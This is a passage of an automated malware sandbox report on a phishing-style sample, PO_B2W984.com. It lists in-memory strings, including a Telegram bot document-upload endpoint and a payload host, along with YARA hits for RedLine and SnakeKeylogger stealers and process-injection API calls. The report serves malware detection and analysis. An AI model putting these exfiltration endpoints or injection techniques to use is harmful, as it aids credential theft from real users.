Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                          Source: PO_B2W984.com, 00000000.00000003.22961850687.0000000022891000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962642028.000000007E75A000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000002.23155674229.0000000020D19000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0$
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                          Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                          Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.23006549497.00000000048E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
                          Source: powershell.exe, 00000007.00000002.23005690561.0000000003119000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                          Source: PO_B2W984.com, 00000000.00000003.22961850687.0000000022891000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22981256081.000000002293B000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962642028.000000007E75A000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000002.23155674229.0000000020D19000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com0
                          Source: PO_B2W984.com, 00000000.00000002.22965692413.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24170624386.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.23004693323.0000000002F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                          Source: powershell.exe, 00000007.00000002.23006549497.00000000048E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                          Source: Microsofts.exe, 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Microsofts.exe.4.drString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                          Source: powershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24180228176.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24180228176.0000000002D3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24180228176.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24191123588.0000000003C96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24180228176.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24191123588.0000000003C96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
                          Source: PO_B2W984.com, 00000000.00000002.22965692413.000000000090E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/
                          Source: PO_B2W984.com, 00000000.00000002.22975988044.0000000020D1D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/wps/200
                          Source: PO_B2W984.com, 00000000.00000002.22965692413.000000000095A000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22965692413.0000000000999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/wps/200_Oupzhkprnvw
                          Source: PO_B2W984.com, 00000000.00000002.22965692413.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/wps/200_OupzhkprnvwE
                          Source: powershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: PO_B2W984.com, 00000000.00000002.22965692413.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24170624386.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.23004693323.0000000002F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Microsofts.exe.4.drString found in binary or memory: https://reallyfreegeoip.org/xml/
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.153.238d
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.153.238l
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                          Source: rpkhzpuO.pif, 00000013.00000003.23143070311.000000002E8BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wdcp.mit
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                          Source: unknownHTTPS traffic detected: 41.185.8.252:443 -> 192.168.11.20:49747 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Contains functionality to capture screen (.Net source)
                          Source: Microsofts.exe.4.dr, UltraSpeed.cs.Net Code: TakeScreenshot
                          Contains functionality to log keystrokes (.Net Source)
                          Source: Microsofts.exe.4.dr, UltraSpeed.cs.Net Code: VKCodeToUnicode

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: 4.1.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 15.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 15.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 19.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 4.1.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 19.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 15.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 15.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 19.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 19.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000013.00000002.23176421665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 0000000F.00000002.23100866629.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 0000000F.00000001.23060773301.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: 00000013.00000001.23140173632.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: Process Memory Space: Microsofts.exe PID: 4824, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                          Submitted file has a suspicious file extension
                          Source: PO_B2W984.comInitial sample: file extension
                          .NET source code contains very large strings
                          Source: Trading_AIBot.exe.4.dr, cfRDgxIJtEfCD.csLong String: Length: 17605
                          Source: apihost.exe.5.dr, cfRDgxIJtEfCD.csLong String: Length: 17605
                          Source: 5.2.Trading_AIBot.exe.2d6fffc.0.raw.unpack, cfRDgxIJtEfCD.csLong String: Length: 17605
                          Source: 15.2.rpkhzpuO.pif.2db40808.5.raw.unpack, cfRDgxIJtEfCD.csLong String: Length: 17605
                          Source: 15.2.rpkhzpuO.pif.2db51c4c.7.raw.unpack, cfRDgxIJtEfCD.csLong String: Length: 17605
                          Source: 15.2.rpkhzpuO.pif.2db630a8.6.raw.unpack, cfRDgxIJtEfCD.csLong String: Length: 17605
                          Drops large PE files
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile dump: apihost.exe.5.dr 665670656Jump to dropped file
                          Initial sample is a PE file and has a suspicious name
                          Source: initial sampleStatic PE information: Filename: PO_B2W984.com
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE824C NtReadVirtualMemory,0_2_02DE824C
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE84BC NtUnmapViewOfSection,0_2_02DE84BC
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DEDAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02DEDAC4
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DEDA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02DEDA3C
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DEDBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02DEDBA8
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02DE8BA8
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE79AC NtAllocateVirtualMemory,0_2_02DE79AC
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE7CF8 NtWriteVirtualMemory,0_2_02DE7CF8
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02DE8BA6
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DED9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02DED9E8
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE79AA NtAllocateVirtualMemory,0_2_02DE79AA
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 12_2_02E2824C NtReadVirtualMemory,12_2_02E2824C
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 12_2_02E284BC NtUnmapViewOfSection,12_2_02E284BC
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 12_2_02E2DAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,12_2_02E2DAC4
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 12_2_02E2DA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,12_2_02E2DA3C
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 12_2_02E28BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,12_2_02E28BA8
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 12_2_02E2DBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,12_2_02E2DBA8
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 12_2_02E279AC NtAllocateVirtualMemory,12_2_02E279AC
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 12_2_02E27CF8 NtWriteVirtualMemory,12_2_02E27CF8
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 12_2_02E28BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,12_2_02E28BA6
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 12_2_02E2D9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,12_2_02E2D9E8
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 12_2_02E279AA NtAllocateVirtualMemory,12_2_02E279AA
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 16_2_02E3824C NtReadVirtualMemory,16_2_02E3824C
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 16_2_02E384BC NtUnmapViewOfSection,16_2_02E384BC
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 16_2_02E3DAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,16_2_02E3DAC4
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 16_2_02E3DA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,16_2_02E3DA3C
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 16_2_02E38BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,16_2_02E38BA8
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 16_2_02E3DBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,16_2_02E3DBA8
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 16_2_02E379AC NtAllocateVirtualMemory,16_2_02E379AC
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 16_2_02E37CF8 NtWriteVirtualMemory,16_2_02E37CF8
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 16_2_02E38BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,16_2_02E38BA6
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 16_2_02E3D9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,16_2_02E3D9E8
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 16_2_02E379AA NtAllocateVirtualMemory,16_2_02E379AA
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE85D4 CreateProcessAsUserW,0_2_02DE85D4
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DD20C40_2_02DD20C4
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_00408C604_1_00408C60
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_0040DC114_1_0040DC11
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_00407C3F4_1_00407C3F
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_00418CCC4_1_00418CCC
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_00406CA04_1_00406CA0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_004028B04_1_004028B0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_0041A4BE4_1_0041A4BE
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_004182444_1_00418244
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_004016504_1_00401650
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_00402F204_1_00402F20
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_004193C44_1_004193C4
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_004187884_1_00418788
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_00402F894_1_00402F89
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_00402B904_1_00402B90
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_004073A04_1_004073A0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_00EAC1306_2_00EAC130
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_00EA94806_2_00EA9480
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_00EAC1216_2_00EAC121
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_00EA2DD16_2_00EA2DD1
